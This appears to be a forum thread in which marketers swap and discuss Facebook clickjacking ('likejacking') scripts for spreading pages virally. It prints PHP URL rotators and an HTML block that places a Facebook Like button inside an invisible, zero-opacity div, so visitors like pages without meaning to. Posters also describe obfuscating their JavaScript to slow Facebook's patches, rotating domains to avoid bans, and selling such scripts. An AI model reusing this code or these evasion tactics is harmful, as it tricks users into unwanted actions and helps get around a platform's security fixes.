You have to meet the right personWhere do people share / sell these scripts?
Carnage is correct, most of the ones floating around now have an array (usually .js not PHP) of URL's, description, ect. that will rotate automatically. It seems that now instead of getting a "confirm" or having your domain banned you need to worry about making a workaround for the small fixes facebook has been making.
Lately a clickjacking script will work for about a day before facebook patches it and you will need to make a quick fix.
So it can rotate between them obviously. Unlike 90% of the fb marketers here I encrypt my .js files with an encoder that is very hard to decode, and to keep people from stealing my scripts.Don't know why you would store a list of ALL YOUR URLs in your .js file...
So it can rotate between them obviously. Unlike 90% of the fb marketers here I encrypt my .js files with an encoder that is very hard to decode, and to keep people from stealing my scripts.
This is one of the main reasons the autoshare last week got patched, so many people just throwing up scripts on domains that were not decoded so before too long everyone had the script, including facebook.
IMO there are two types of fb marketers out there, those that attempt to preserve the life of viral scripts and those who don't.
Let me guess which column you fall into...
<?php
$random = (rand()%7);
$url = "http://someurl.com";
if ( $random == 0 ) {
$url = "http://someurl1.com";
}
if ( $random == 1 ) {
$url = "http://someurl2.com";
}
if ( $random == 2 ) {
$url = "http://someurl3.com";
}
if ( $random == 3 ) {
$url = "http://someurl4.com";
}
if ( $random == 4 ) {
$url = "http://someurl5.com";
}
if ( $random == 5 ) {
$url = "http://someurl6.com";
}
if ( $random == 6 ) {
$url = "http://someurl7.com";
}
?>
</div>
<div id="wrapper" style="position: absolute; opacity: 0.0; filter: alpha(opacity = 0); margin-left: -50px; z-index: 0; visibility:hidden;">
<script src="http://connect.facebook.net/en_US/all.js;xfbml=1"></script><fb:like href="[COLOR=Red]<?php echo $url; ?>[/COLOR]" send="false" layout="button_count" width="100" show_faces="true" font="arial"></fb:like>
</div>
$random = rand(0,10);
$url[0] = "http://someurl.com";
$url[1] = "http://someurl.com";
$url[2] = "http://someurl1.com";
$url[3] = "http://someurl2.com";
$url[4] = "http://someurl3.com";
$url[5] = "http://someurl4.com";
$url[6] = "http://someurl5.com";
$url[7] = "http://someurl6.com";
$url[8] = "http://someurl7.com";
$url[9] = "http://someurl7.com";
$url[10] = "http://someurl7.com";
echo $url[$random];
<?php
$MESSAGE = ''; //Your Message
$random_url = get_random_url_from_file();
$MESSAGE = str_replace('REPLACE_WITH_ACTUAL_URL', $random_url, $MESSAGE);
// test output: print $MESSAGE;
function get_random_url_from_file() {
$path_to_file = 'urls.txt';
$urls = file($path_to_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$rand_keys = array_rand($urls, 2); return $urls[$rand_keys[0]]; } ?>
Can be a nice idea to dev
There was someone selling a slightly modified version of what I posted (which was custom script owned by me) for $50 a while ago.
I would suggest researching facebook clickjacking scripts there is a new one posted here almost weekly and most are short lived, not viral, and saturated. Typically in my opinion clickjacking is what most of the facebook newcomers start off with and there is hardly anyone having success with likejacking anymore. The ones that usually do are putting in a lot of effort for little gain usually nowadays anyways.